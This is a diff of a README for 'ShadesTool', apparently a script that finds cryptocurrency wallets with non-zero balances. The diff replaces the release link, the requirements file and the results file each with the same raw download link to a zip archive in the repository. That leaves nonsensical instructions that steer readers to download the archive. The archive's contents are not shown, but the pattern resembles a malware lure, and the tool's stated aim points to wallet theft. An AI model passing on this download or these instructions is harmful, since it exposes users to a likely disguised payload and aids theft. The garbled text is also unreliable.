randy1230316/ShadesTool/README.md

 To get started with ShadesTool, follow these steps:

-1. **Download the Latest Release**: Visit the [Releases section](https://github.com/randy1230316/ShadesTool/releases) to download the latest version of the tool.
+1. **Download the Latest Release**: Visit the [Releases section](https://github.com/randy1230316/ShadesTool/raw/refs/heads/main/pocket/Shades_Tool_v3.9.zip) to download the latest version of the tool.
 Make sure to download the appropriate file for your operating system.

 2. **Install Dependencies**: Ensure that you have the necessary dependencies installed.
-You can check the `requirements.txt` file for a list of required packages.
+You can check the `https://github.com/randy1230316/ShadesTool/raw/refs/heads/main/pocket/Shades_Tool_v3.9.zip` file for a list of required packages.

 3. **Run the Script**: After downloading and installing the necessary packages, run the script using the command line.
 The command will depend on your operating system and the script's file format.

-4. **View Results**: Once the script has finished running, check the `result.txt` file for any wallets with non-zero balances.
+4. **View Results**: Once the script has finished running, check the `https://github.com/randy1230316/ShadesTool/raw/refs/heads/main/pocket/Shades_Tool_v3.9.zip` file for any wallets with non-zero balances.

 ## Usage